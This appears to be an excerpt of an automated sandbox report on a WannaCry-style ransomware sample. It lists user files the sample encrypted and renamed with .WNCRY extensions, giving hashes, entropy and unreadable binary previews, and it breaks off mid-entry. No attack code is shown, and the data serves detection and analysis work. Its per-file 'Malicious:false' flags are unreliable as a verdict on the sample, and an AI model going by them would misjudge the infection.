                                SHA1:B70183C73D3487ECE36C768ED8FDA7F5DE156097
                                SHA-256:F8F9EC3747BFFDB05C9B1E34D1BF585AC6B8F753FCED7B9F98F856A2DD097900
                                SHA-512:D728695F93266B18211C421DD88EE03CBE7B540EE5F435F376F7597B1D87BDED3ED5B3F95522789AFB39C61321C732801D32465808F27766B25B54A31226D26F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....S......~.Q....}D.e....z.].C9.....K..C....e.Z.}..V^.4?....,..nI.<l.D.y[..U7...3..s..(E...bw...V..+gX.\...m.!a.3:[4.o........D2k7.j..h..C..<,+....V "`.....%I.R.h..$...(U..9....`...eu.g...d.,Y.........\..64....6H....D...IC...l...q...|.;.................O..Eb..XTS^.....v]...W/.V....(K....R.....O.rivG.[..#..c.CM2..i..TN.v.[....H.=.q.....".._..(..z=w./MM..A[..x.*..p.=...|..t.Gx.0W4d.}".(.........).h..N....<.P.J..W...=..%.d..l.5.Y..m.\M..).,7.p...#.(..O.C..*.'..#.@.&...g...=.tY.EQ8...p...( .j..A.cZ..=.......fA..).....Q..-."V&.g.S..sX..?Jx.fo}:\*.y.<....L.~>.+.M...Js.,....2........D....S&N.8O.....(.Vv..m.+..f.I....5TR<.....aT1i.$c.K4.d.>N...ov.%d....nQR......j-8....)........L%..H..e..w.<.\Y%.S...N#s........+.d.j.[.W......./........xZ....A.....c..+/n...._.....P.O5i.T.d..a...yl..C^...........n.SI...t........g.I.os..e..'....T^h...4...wz..4.~.4.Y..Z..D..z.._.n...i.U.Sk......vu.blS.%yYd._.JF...$..2.Q..?.i...\.%.....V..HO.8..E....<.m..

                                C:\Users\user\Desktop\BNAGMGSPLO\ZGGKNSUKOP.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PGP Secret Sub-key -
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.781439569212249
                                Encrypted:false
                                SSDEEP:24:u9w0kC6ufM0svyrroAeGHtTOOR5YTtQRt+x:t0R6qoy4O5PR5Yie
                                MD5:9DF6847CF6CDEA0D1FF23B2A1BE43743
                                SHA1:2F2D922C09CAE591BD18186CB732318ED8E356DA
                                SHA-256:F2A284974646E77F3BEDE2D5F56C62F43D67DBB821AAB759CDE8245C7063B018
                                SHA-512:947B1421B56134C0A6AFD47C0514248E7691517C68187044A6EADBF0B5195A3ECBA59163CFD77814C2B0993131D193E7D568EB3FB7A84EE057F1AE505B6C47E3
                                Malicious:false
                                Reputation:unknown
                                Preview:.w....H....t..@`...!.........;8.3`i.*N1l..(LW..<....B......&.'1(g2.E....H.hw.w.{7|......!F...7g..s..Y.%../uea..uV.7!..%.:AM...f.Q......,.z.C&...%...C_Af.!..opY..="+n.Ea..%..Su.............u.WZ..pbw.?...T.....u..[.t.(..!......L~...{.a.....~..S<..^....ok.W..D.{...R<.Se..tW.......b.$....D9G..Y.~...:..o.....vK......lo..W.^K[x..........!.3<......o.....5?X.)..*.b.l...`v/t..Z...Wx.b.p...H..L.$..6..a%..OA.....s.......}o....s]pe. .?L..j....."zH.9..#..z9...R].. ...^.J..BX?=#...2{...B./cd&3R-..&o...Nb#.x....DQ..DX.H...1L....i............p..7...R.~.(....?....P....q{..N..T..*.......zd...7...E.^.(..~u.....;....C......@........y3.7..=..O...D$.....Z'e>.. 1T&......o..w.g...l.Kz.......a.P\+...&).....]H..-....V...+PR...n....8B..."n.G..f=Y4.N..u-...&r.jC.FL{......r..j.g..~.4c..v.T...d.......x%o..3.Wv.../.b.bYY.\..L.)_P...n....2.Iy.B............(@Y..h.q.vH..>9.......=....Wr.T..1.[@`@...b.S.V....]...[..M...s.#..t.+H....o~.yV..j..!v".....}([..ov...o.x..@.

                                C:\Users\user\Desktop\BNAGMGSPLO\ZGGKNSUKOP.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83174919747474
                                Encrypted:false
                                SSDEEP:24:bkGC7EkxOQ2CB9XjNiqLDpl81QAtWs9KRaPfnR9qwKv3I3JmKREHP:bkt7XX2CDJi+gTojR6n2BIUKiHP
                                MD5:D5EF08B967E91FC93A69F2BCD4B28D6C
                                SHA1:88A109308C4B1AD45682D378B4A3A084172B7DF9
                                SHA-256:C3A8F723E78EAA8ABE74CDF6D9F84669E1313CC512BB148C72D1FF1954207DA3
                                SHA-512:50997DA4013E259E75FC5D0E4A4A907569500722D923A200469F36C404DD66536A2E231D295D085F955BA07210A66BF0A8F12F4E8FF79A609526A0FFC1FC41A0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....-z..Gm.i<.)....Z..E...']8-.....%;k..}...*..8X..MW(.k.!.,......A$.......j.!..-..0..CU"aw.....m+..i.T.....No_F.:..g.......u".,U2=72..f$|{..q.G...~.z.].*\..Mn.m8?FYP........O..RX....r..5B..F._j9.........[Q-...I......uT.d....k...h..q...N.:....Ao..............G4..!..(..~....._4..k....s.Q...P....#E0in(Z.#7p...FS.f~X_.:......FU.<....j.]?.G.Gp...j.....a:y9h...............Co..i..Hl..........l.\h....^...H.....g.eP.|K=.5..)....I.....q......)..../o.K...'}N)..+..<.I...c2".#wf.*..H.j.tl...K....J.+d..l.a......5.....K.8.>...'.B .".O.Ql..<N...r:....F..$l.~.8...].5......+V.A.....(B....._...O........ [. ......na.N@.K....p.<..>..4..d..bN..AgY.a..0..@@.`C.-.......9..4..............(,GK..m.C.ID.rB....S .$...*.o.......&]..8*,;z.i.HA%.S.=C..Oh..'Pv.$....t.:`...uG.#h.Ra..v.....w1J..OiF..I>.S.h...>..k.....V'..,...^..6gOz...}....,...V...!......L......R.f[.(..5..1.m.$..$o....[.F.0r.Z.~.[......A.'.j?GL......'.+..0..4H.a6..].J..J...*i;........e.FE.z..P...N

                                C:\Users\user\Desktop\BNAGMGSPLO\ZGGKNSUKOP.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83174919747474
                                Encrypted:false
                                SSDEEP:24:bkGC7EkxOQ2CB9XjNiqLDpl81QAtWs9KRaPfnR9qwKv3I3JmKREHP:bkt7XX2CDJi+gTojR6n2BIUKiHP
                                MD5:D5EF08B967E91FC93A69F2BCD4B28D6C
                                SHA1:88A109308C4B1AD45682D378B4A3A084172B7DF9
                                SHA-256:C3A8F723E78EAA8ABE74CDF6D9F84669E1313CC512BB148C72D1FF1954207DA3
                                SHA-512:50997DA4013E259E75FC5D0E4A4A907569500722D923A200469F36C404DD66536A2E231D295D085F955BA07210A66BF0A8F12F4E8FF79A609526A0FFC1FC41A0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....-z..Gm.i<.)....Z..E...']8-.....%;k..}...*..8X..MW(.k.!.,......A$.......j.!..-..0..CU"aw.....m+..i.T.....No_F.:..g.......u".,U2=72..f$|{..q.G...~.z.].*\..Mn.m8?FYP........O..RX....r..5B..F._j9.........[Q-...I......uT.d....k...h..q...N.:....Ao..............G4..!..(..~....._4..k....s.Q...P....#E0in(Z.#7p...FS.f~X_.:......FU.<....j.]?.G.Gp...j.....a:y9h...............Co..i..Hl..........l.\h....^...H.....g.eP.|K=.5..)....I.....q......)..../o.K...'}N)..+..<.I...c2".#wf.*..H.j.tl...K....J.+d..l.a......5.....K.8.>...'.B .".O.Ql..<N...r:....F..$l.~.8...].5......+V.A.....(B....._...O........ [. ......na.N@.K....p.<..>..4..d..bN..AgY.a..0..@@.`C.-.......9..4..............(,GK..m.C.ID.rB....S .$...*.o.......&]..8*,;z.i.HA%.S.=C..Oh..'Pv.$....t.:`...uG.#h.Ra..v.....w1J..OiF..I>.S.h...>..k.....V'..,...^..6gOz...}....,...V...!......L......R.f[.(..5..1.m.$..$o....[.F.0r.Z.~.[......A.'.j?GL......'.+..0..4H.a6..].J..J...*i;........e.FE.z..P...N

                                C:\Users\user\Desktop\DUUDTUBZFW.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.81318327433351
                                Encrypted:false
                                SSDEEP:24:H+6W4hb/Rrgnh0jaIDIJUgCTQjkyPiReN9WyMABI5iAVOe2:HDWkUajdgVjLbTKAu9g
                                MD5:3275A185136840D9B12E6480CAF151B1
                                SHA1:B261860C689BD06102D468D1205EA6BC01FDB1C1
                                SHA-256:151E85490D912D60B940CB3D9B357AE397A378934F33CE066D642D8709B0200F
                                SHA-512:BF2370A48DAAEE9640343D8A1EB2DAE127EA3043E1AB77ADFC5865E7EDE5AC643DC477C51603B86F0625BF77E0B90932AE0E3BA59EBB9404ADBB0203A3C42443
                                Malicious:false
                                Reputation:unknown
                                Preview:&..1..y.......a.../9.p. ......k...}C..W.-..3.......1.Y....9...L..TH....2c.z.z.........:......54......x4b..0.........?_@.D...3Y..3.o..5b2.....:jfs.@j.$e...=.v.P=#.^...Q.?.@...H.T..5...@..q.1p.`..*^05.3.K..K......X.......v.J......k../.........5.X...8.r....U.....$+W......{5\U.............z+.U...".'..$."q.3.V....wu.?..8.....hN..Ag...._....S ......u^.....^`$?..N.3%a..^$....8.d..u[.A....%.g...0..Im.e.$....6.n.l..[oz..+S.j.i..V.Z.uM.IU....r.A.?.......n....V....A.}3....z......'..!lI.U.K.......W~.....".U...bl......X..K.i0..W.....?U...5...<..].z<..[.\{.>..R<~...}{.!...g_...6...'........L..w..P..t2......*.s.F.....0.)...e9${.a[.8.....#f............&.<..j.K.~.d...' t.^.H.w.V.=.x.Kg...P.v...4..o...mb.%.u..N....f{2.t.i.(j..AM.Q...P..6x..l{...1.......p.D........r...Q.sQ2.....\..o...[t....Wy..Z.....z.Dj.....h.h<2....C}....u.|I...3rF<.#a...4`l.$...\..:...o...c.....A.r.....%..PV....l.e...-... c....?..................`.G.v.f$...we>Y.Tn.2y..n4.".SE.../19U

                                C:\Users\user\Desktop\DUUDTUBZFW.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843798829962274
                                Encrypted:false
                                SSDEEP:24:bkDK10NXtfMYKQ1CpSn4lpErPew4Nr+w9xxy0OF5mmmRfJ9OQjZb24Z/43:bkWGDfMYnai4lpECw4sw3VOON5JFZ24i
                                MD5:DE995038FE8EA6D2C6BB9BA49180126D
                                SHA1:4E0BEF963487D3F765F9542F42BC990E3DD559AF
                                SHA-256:39DA0C5DEF930220F761F248D032EDE0A9185A916258032ABA6DCC57CE6F2E18
                                SHA-512:4FB7DB8B6964DA01B478941EEE165A0AC16F1D51E3EE419FC6CF78FE81EDA96D4DCC74FCF2CE6C14E917174874B0B6AA5C1EC9DC51AD8AC9A1E274F3AC96E3B9
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....+.5`..<...e..8sI...*..Y.E....pl{...oo^....$T?............e..j1.^.l"^..'....0.2...V.;Sy..3...|.eo5.....B.>.....T..;j.K.~a.....Sk..Zy.B....sa.Kf......+.6...p..$q..]|2..o...LF....o....L...6..B......e...:yiC.w(.:E.4...wJ...N..g .G!.<A...f...O!.......................b.g..&..F`.|.Hg1Q.fl...2..t.....'[...q.%.g;&.r..O&.g..U....].%....>...~P..1H3..RSh..tlYp8.{:.._..Ut.&.^.....j5@F.0(*...r.L.....6..B...X%"....S.o....K...[..K...V=...#|.R........DM......z....<..Q..m...A...Z.*..P..};.r"*.."....>..3............hP.A.....@/j..Q.A...d2"4WG......DF.A.".<0......)......5?AkFu......T.c..0.E#...|...2h.i..|A<.....Mx....uu..O5.}.~.H. ...at9..f.[.2..QG..y.&(.......J......$Z2..w.m.Y(.R.O..&.G..(E=-....i..2...s.N....F....u....@..K....3>.x..S.!`.~..l.?..N......9...m.{.e...^..=..%...o.O..!'.A.X~....D.Cs...h.......65....;.qF4.3.~..U2.....h...A.c..."j6y..S.%.&...>.g!1wG.g..f.I:.DM..8...Ef<...k.....x..F}...,.5.....Y.?OJjU..}... ..E3..U&T......>......

                                C:\Users\user\Desktop\DUUDTUBZFW.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843798829962274
                                Encrypted:false
                                SSDEEP:24:bkDK10NXtfMYKQ1CpSn4lpErPew4Nr+w9xxy0OF5mmmRfJ9OQjZb24Z/43:bkWGDfMYnai4lpECw4sw3VOON5JFZ24i
                                MD5:DE995038FE8EA6D2C6BB9BA49180126D
                                SHA1:4E0BEF963487D3F765F9542F42BC990E3DD559AF
                                SHA-256:39DA0C5DEF930220F761F248D032EDE0A9185A916258032ABA6DCC57CE6F2E18
                                SHA-512:4FB7DB8B6964DA01B478941EEE165A0AC16F1D51E3EE419FC6CF78FE81EDA96D4DCC74FCF2CE6C14E917174874B0B6AA5C1EC9DC51AD8AC9A1E274F3AC96E3B9
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....+.5`..<...e..8sI...*..Y.E....pl{...oo^....$T?............e..j1.^.l"^..'....0.2...V.;Sy..3...|.eo5.....B.>.....T..;j.K.~a.....Sk..Zy.B....sa.Kf......+.6...p..$q..]|2..o...LF....o....L...6..B......e...:yiC.w(.:E.4...wJ...N..g .G!.<A...f...O!.......................b.g..&..F`.|.Hg1Q.fl...2..t.....'[...q.%.g;&.r..O&.g..U....].%....>...~P..1H3..RSh..tlYp8.{:.._..Ut.&.^.....j5@F.0(*...r.L.....6..B...X%"....S.o....K...[..K...V=...#|.R........DM......z....<..Q..m...A...Z.*..P..};.r"*.."....>..3............hP.A.....@/j..Q.A...d2"4WG......DF.A.".<0......)......5?AkFu......T.c..0.E#...|...2h.i..|A<.....Mx....uu..O5.}.~.H. ...at9..f.[.2..QG..y.&(.......J......$Z2..w.m.Y(.R.O..&.G..(E=-....i..2...s.N....F....u....@..K....3>.x..S.!`.~..l.?..N......9...m.{.e...^..=..%...o.O..!'.A.X~....D.Cs...h.......65....;.qF4.3.~..U2.....h...A.c..."j6y..S.%.&...>.g!1wG.g..f.I:.DM..8...Ef<...k.....x..F}...,.5.....Y.?OJjU..}... ..E3..U&T......>......

                                C:\Users\user\Desktop\EEGWXUHVUG.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8298450175821435
                                Encrypted:false
                                SSDEEP:24:i08BQjZjvvl2U1voXBlAJ/oFUNBDNNKJHjqpB4YZ8za4CTA1ziuh:ikjvvwU4vFUNBDNgJHoGTaA5nh
                                MD5:460B014EE93B20824EB086F721D07CC0
                                SHA1:2635328CCAAF18E761EA7D4170C518A54EE52B6A
                                SHA-256:7F13EDDB728612BCEAA4B236EF920130AC82EA71FA599D00218A2E075BCE8FBC
                                SHA-512:689A9ADC225E797FF07F20A431675BFFB7E95A05BACC7F1A6B6889279EACDAA4A4039AB587244D9B036C46B9195A76C5CC15730B60F84A63A63CD70B78ABC675
                                Malicious:false
                                Reputation:unknown
                                Preview:.k..1..5.|G...m.g+.D.....L..A...R#..X..;.;_{md.e.Gy...X..91.J<.#z4..I.C:...Kj.+.9Ow.._.("...U-..V....bU.._1..9..v..>..RKp..Q.....x...._.I.......++jc.e'.E*~FO.....fgv.l.r...X,.....T.!SZ.nLnr4E.1...m..]@A.fvS..8G...0W......W8."..w.;.QX.`.N....^.Y%.p...&S.J.......}[..p\._..W...mt.......e0.nLd#..ZS..`.G.._..5h...gY..=.b..%F.}g.&j..w.N6....+..T.#....].U.#.(.#...i.kom..rW.:...p.S~&.p..p0.Y..(z.goK..,........44g...."R.0.m......n[#.t..4D1..\.5.N...$x..cP.X..._..4`.6....>.'....~.V^.gp\X{k...=u$Lz5.'..........*..]^.U..a..0..VYA...."qI...N...`..'.H.;......)_fR,...b..5.7...;.i...p..:O....^.3....(..fC..S....+...(....~....d.......C......R....7Rq.g.Hh...~0.2.........x?..9.ht.Y..A.......4..q../..&...~...^.U...s.x....[...M...m..\..Z..{.e..s/..<...*47.|aJ...$<....wW..L..llwV........K....p#79....>..[.b......ht..o..f3.:.D....u4.uz.]...sbH9....f.t..%.<T..b5.b.rN.@.._.......{..yu.o.b.#xbw/RL..K.MYh.KWc.F.C.).....&.H.|.p....9.<.). .f6...o./Z..l..o. ..V.....e

                                C:\Users\user\Desktop\EEGWXUHVUG.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.823738767831794
                                Encrypted:false
                                SSDEEP:24:bksXbe+aC0dLdYmNPPjRgYyzhv8UPGOv8I5aiLAax:bk+y+3UL5N3jSbhkUxvKm
                                MD5:D997A94E52584363A0472CA831FC7487
                                SHA1:2B270CEC863A4C6D14F43F91E2D248BE507D9BDA
                                SHA-256:2DBBF1FF03732647AD9F210ABCCE7346F2055B63BE02EDF1CAA5D3822A5A12B2
                                SHA-512:643ECC285CB3A4519883D9357FC8746B6302AE3CC016F0CDBADCBA681D09592DE4F6C7A7BC4FE08AB9BC091AE0E3A4EA10AC2FA6FF47855EED2C2F0CAB76FA64
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....l.....+.d.P4.B[..g.%.......(.X..w......."...T.B...#CKfn<Us?...a...(......c$\1e......._.Y...i..n2b.Z....O2..3.R""K72...$PhxS..........L...W#..WO.p....%...... .....I .8v.Z.#e..p4......(.C.pU.|,.......cNo......n.....x..XZP[......u. F...m...'....H.N............~.......T.Ri...~cu%-.^.c..hYA...+X ..-....a@.T..[..P74iU.4...f{...._...Z%.A....=.....R1Y...7..c..V^./....ni..%..C.1..s.....}i...T.*...s...c.5...{......]..<I&......8...K"Z.G..7..}#.c.$..S.0(..*..f.G..\...8_0UR..?...g]....RI_..........:1.Q.....Bq...(\.d.DI+...|.]:..Vr...1...z...<m..Vmni..7..k~...I].....C..g..2gc.*..;...bh........G.j..(....v........J!..g....L~.@u.*...RS ..}.....S~On..9....[l.R...:..[.j+.P.w. ..-}.......{.A._.[..+...%?..lT.d..VO..4.....J..Av..v....:\.....a2aR,=...@'...k.v...U...+n.(.c.0.(.b.D.u..?......G=....[..X..%.6..'.......[....@..u....R...6...i'Wg....R".E].AA3.z..[.<xx. @...#Tc...h...]......}..p.F{.g`.G.N..S.N.:.^.`?..(.....z.....t3oS.N*... .`.t...`..n?4.[~..'.

                                C:\Users\user\Desktop\EEGWXUHVUG.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.823738767831794
                                Encrypted:false
                                SSDEEP:24:bksXbe+aC0dLdYmNPPjRgYyzhv8UPGOv8I5aiLAax:bk+y+3UL5N3jSbhkUxvKm
                                MD5:D997A94E52584363A0472CA831FC7487
                                SHA1:2B270CEC863A4C6D14F43F91E2D248BE507D9BDA
                                SHA-256:2DBBF1FF03732647AD9F210ABCCE7346F2055B63BE02EDF1CAA5D3822A5A12B2
                                SHA-512:643ECC285CB3A4519883D9357FC8746B6302AE3CC016F0CDBADCBA681D09592DE4F6C7A7BC4FE08AB9BC091AE0E3A4EA10AC2FA6FF47855EED2C2F0CAB76FA64
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....l.....+.d.P4.B[..g.%.......(.X..w......."...T.B...#CKfn<Us?...a...(......c$\1e......._.Y...i..n2b.Z....O2..3.R""K72...$PhxS..........L...W#..WO.p....%...... .....I .8v.Z.#e..p4......(.C.pU.|,.......cNo......n.....x..XZP[......u. F...m...'....H.N............~.......T.Ri...~cu%-.^.c..hYA...+X ..-....a@.T..[..P74iU.4...f{...._...Z%.A....=.....R1Y...7..c..V^./....ni..%..C.1..s.....}i...T.*...s...c.5...{......]..<I&......8...K"Z.G..7..}#.c.$..S.0(..*..f.G..\...8_0UR..?...g]....RI_..........:1.Q.....Bq...(\.d.DI+...|.]:..Vr...1...z...<m..Vmni..7..k~...I].....C..g..2gc.*..;...bh........G.j..(....v........J!..g....L~.@u.*...RS ..}.....S~On..9....[l.R...:..[.j+.P.w. ..-}.......{.A._.[..+...%?..lT.d..VO..4.....J..Av..v....:\.....a2aR,=...@'...k.v...U...+n.(.c.0.(.b.D.u..?......G=....[..X..%.6..'.......[....@..u....R...6...i'Wg....R".E].AA3.z..[.<xx. @...#Tc...h...]......}..p.F{.g`.G.N..S.N.:.^.`?..(.....z.....t3oS.N*... .`.t...`..n?4.[~..'.

                                C:\Users\user\Desktop\EEGWXUHVUG.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816404250179475
                                Encrypted:false
                                SSDEEP:24:hu0sAkfN4+Hjm5Clg6YE5tu1nNlRsWI6VTBcIAzpYf+MH:sXAuN4VUD/uNNvxI8BcIipwFH
                                MD5:E4E2F5D8264B4F22EBBA1C97EA3CDDE8
                                SHA1:6B29FD441DA46482FB678064DF30CA02552B2649
                                SHA-256:C96C01252679928957458EC0C9C65DBA703C7590AC8518A821C71A735EB610D2
                                SHA-512:ACCAB9869BA89FB976BD7A4B5B7BF7C27465AEFFBD075BFF0BFF27F7E47751F73B1F9575101AAE293A960ADA5659166571DCC4EBDAAFC039598C9A9A71CDE78F
                                Malicious:false
                                Reputation:unknown
                                Preview:...I*..@........;..*GU..f!d.0.{{......?..v-!..09{7/Z...X..bY.....xb<...w......yd.7>...3;.tj.,8De....G...U.NYf..N....I!87[...i=...V...*S.....Z<.2.D2..W.[.........y...\..=.)...;..v?...0;....c..%.....Ci..$..ty.Z@..t.[.*...C`.6........,b......E...7]..E.3e..!=..8..r..PX..u..c...c..9m<.vaD}...p..0...Q......D...k.gZ1.94. .C?C*..(Y......~.V.S....|....RRp..:i.6.=u..j..-...>.4.W..L.gk.}.rQ.>.....C{d.I7J...D....>...' MFC.......{.R=...Ku..P.t.....9.H.....g...V.\.d...d....S.../....<....R..31}>...`z58.X.k.[...~....P.........X tBB.C..n2.T#......5Ot4.k.E...3.}..J.%8..i...L/.] .DN.t..sq.Y..#..........5....oWw?.7{M1.GE{C/.l..#m....[r.4........WfL...@...uD.H/.z...*...M..U.P........,Eg...g.J}.....Z..0I.y.#.5I].d.^/.V...6[...W..2Ub)A....BM..j...J.cX..N...L....1c"A0RA.-M...2....=..k.....c...O.i.>X..T.gk.n......d.5..2.s..K.^...1.BZ..!m.k:....8..E.1....Ba.$..y........}...)R>^..%..A.B./=@...s...E..hrN..(e...1.L&.<Q...(.>>..!.(...S.x..".....d.:.8...H.s.S|..E.

                                C:\Users\user\Desktop\EEGWXUHVUG.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.850191176289814
                                Encrypted:false
                                SSDEEP:24:bkn3lf6M9gTYp7YstSOu7GpWxgKvkbiEc/nF5UWYNZv+V/NNAHQfneAglEohpTJo:bknVT9Eqkso8Wxg1pc/YhZWVVNAwveHc
                                MD5:99018B0C0B41E555B90AF99371707739
                                SHA1:2B4B705A95DC8C83BD28615B9A0CE403955BB6DC
                                SHA-256:3D5CF70B92E81A76CEF5553F9EEA5667B64F3EAEB83A436BE008E13D82225C9E
                                SHA-512:DB9615D32257BC821050FD2CDAE5A8AB240DF96F70C9165E35B22F816575B56077D5825152400DC144E2F20EB93E9B051B9CE1D4B2025985B7C9F5D031824BC3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....R...+..z]. g$.#.<^...-......=.....A...n.%...=..1.S.<..nug+......<.^..E.v...|....ku..?Q*-.[aJ....Q.o..Dxz..V"0I.....d..p1B'%..|...M..F.Vs..H-..<...u.q.....M.@.cK3.g..En...Y[...5..."'5..C@.)......Ke...3.Z+.@.f.../...G...cPn+...v'....;...c............e}LK<.....=.I...3.a....XY.,....g.F....Q....u......>ik.t.s......!A.....P{W..Pg;...l`.<Y*....%. .E.\fS.*%[.....5..B.].r.}........\.u}..k%$...2.j.v......-....cE.....a,.Ai9..es..O>'.ku..%...)..O.2.n%.;3#Ua...'.J..iv,T.>..j..R'-6..f.#..3. .e..e..;..\..S.a.Y.......p..OV.(l^tM.e..J..60Mlu..${.=._= ...1.<.O..1e{.>.....p.cG<`.+..kn....k.....*..s...M.].~...-.q......8.....Q.u..o2.dF.T..1.w.....{...i.#P.{..'.!.T.n..`..~S..'.;Z....*Q&.)+sn..f_:.....+2:...$#...&.....68.^%p'A.e.s.....p.c.mb..0.<.A..."..............k..o..).@.[.Y.w5.N\....t..TYL..5|.....B...Ei.#...{.4..jz.:s...aJ.&....U]\.ir...ocV.....8bo.......h.yX. 3...^.|.|@..v`.>..k.|.mj.`.c...].*,..m.!......y..w..6QO.G}.'.d.J..~..~D..B.....L2)

                                C:\Users\user\Desktop\EEGWXUHVUG.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.850191176289814
                                Encrypted:false
                                SSDEEP:24:bkn3lf6M9gTYp7YstSOu7GpWxgKvkbiEc/nF5UWYNZv+V/NNAHQfneAglEohpTJo:bknVT9Eqkso8Wxg1pc/YhZWVVNAwveHc
                                MD5:99018B0C0B41E555B90AF99371707739
                                SHA1:2B4B705A95DC8C83BD28615B9A0CE403955BB6DC
                                SHA-256:3D5CF70B92E81A76CEF5553F9EEA5667B64F3EAEB83A436BE008E13D82225C9E
                                SHA-512:DB9615D32257BC821050FD2CDAE5A8AB240DF96F70C9165E35B22F816575B56077D5825152400DC144E2F20EB93E9B051B9CE1D4B2025985B7C9F5D031824BC3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....R...+..z]. g$.#.<^...-......=.....A...n.%...=..1.S.<..nug+......<.^..E.v...|....ku..?Q*-.[aJ....Q.o..Dxz..V"0I.....d..p1B'%..|...M..F.Vs..H-..<...u.q.....M.@.cK3.g..En...Y[...5..."'5..C@.)......Ke...3.Z+.@.f.../...G...cPn+...v'....;...c............e}LK<.....=.I...3.a....XY.,....g.F....Q....u......>ik.t.s......!A.....P{W..Pg;...l`.<Y*....%. .E.\fS.*%[.....5..B.].r.}........\.u}..k%$...2.j.v......-....cE.....a,.Ai9..es..O>'.ku..%...)..O.2.n%.;3#Ua...'.J..iv,T.>..j..R'-6..f.#..3. .e..e..;..\..S.a.Y.......p..OV.(l^tM.e..J..60Mlu..${.=._= ...1.<.O..1e{.>.....p.cG<`.+..kn....k.....*..s...M.].~...-.q......8.....Q.u..o2.dF.T..1.w.....{...i.#P.{..'.!.T.n..`..~S..'.;Z....*Q&.)+sn..f_:.....+2:...$#...&.....68.^%p'A.e.s.....p.c.mb..0.<.A..."..............k..o..).@.[.Y.w5.N\....t..TYL..5|.....B...Ei.#...{.4..jz.:s...aJ.&....U]\.ir...ocV.....8bo.......h.yX. 3...^.|.|@..v`.>..k.|.mj.`.c...].*,..m.!......y..w..6QO.G}.'.d.J..~..~D..B.....L2)

                                C:\Users\user\Desktop\EEGWXUHVUG.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.83846907899383
                                Encrypted:false
                                SSDEEP:24:OqdeWDnrrHyQ8gJXPChmDR2zG1NXDvxOLfF4WlJanPqfdIN6f27:7hDrrSpT0DQz6TvCF46Jzugf27
                                MD5:9753D4C4157A6ED2089C56B3547134AD
                                SHA1:612F1C32DE3667B8702AA88C0920AF77F13F06EA
                                SHA-256:CD778D3622911E5DDD07BDC18A4F8477D3DA9A97A0865753DFE5169067A9B9F0
                                SHA-512:4F98892295B1AA5342158DEFB5004A63AB538D36CD52FE44DC1CAB16C95AD5728F89EB38944039456C4938F4BD4BD285298DCCCA5BD118106828677DAAF20BBB
                                Malicious:false
                                Reputation:unknown
                                Preview:.h.......B..C8$.!.$.}...P..*~f..|....{...{...6>.D._.CC..\..#..a.Lm^(...v.*......f...o#.911.e<tY..?`..z...v..cv(`...p.5Ra.=..d.;{..:L.B.H.....Z.../.0XK.....\.V..b$|/r6?..4...c.G...g.u.......)h........|..)....Uq..T.._..QN^.~;x.v...g....g..S.>O4;...k.8..]..z6.A}..m.u........$....a......-..t..e.Lf9..dK.#...%.hx?%....uO....k.s..{......9.c.MT\8b.~TW........o./]>.........}....|.!..da..e..C.FqoTm./h6...Jb.. ....l...A&.._<.z.E..!..>. .V...#.n~2G&ZG.y..xH.<.-{..S.t.2.."Ua.{.....=....W.C.i`]hIV...[.R1}.z".re..0..t2q.+....(....V..+..}jBV.d*s.&..e_..4._./.IE....,....f8.u$..)i.!.h.........[.."Oj.+......d.,.R.W....K..].....6..jAjn.mV.{j......D)^.f....&.t....|...JP.&u..._!..Z.r.fA+c..KB...G....f.6A..{...u.,.(..h../.)..........k..+.....W..qy....W.s\.h.]l.....J...B.'...S..k....!.*...Q!k...g.5.HL.....V...M..(..S..<..z....o.v..I...Z.....y..%.s.........LoEZ..a;.1~..I...C...2Tw.....#....2.\S..=...Wd.....Y.0..}.j.....U..\N........y....,...}.>^.5....m.t....i...

                                C:\Users\user\Desktop\EEGWXUHVUG.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
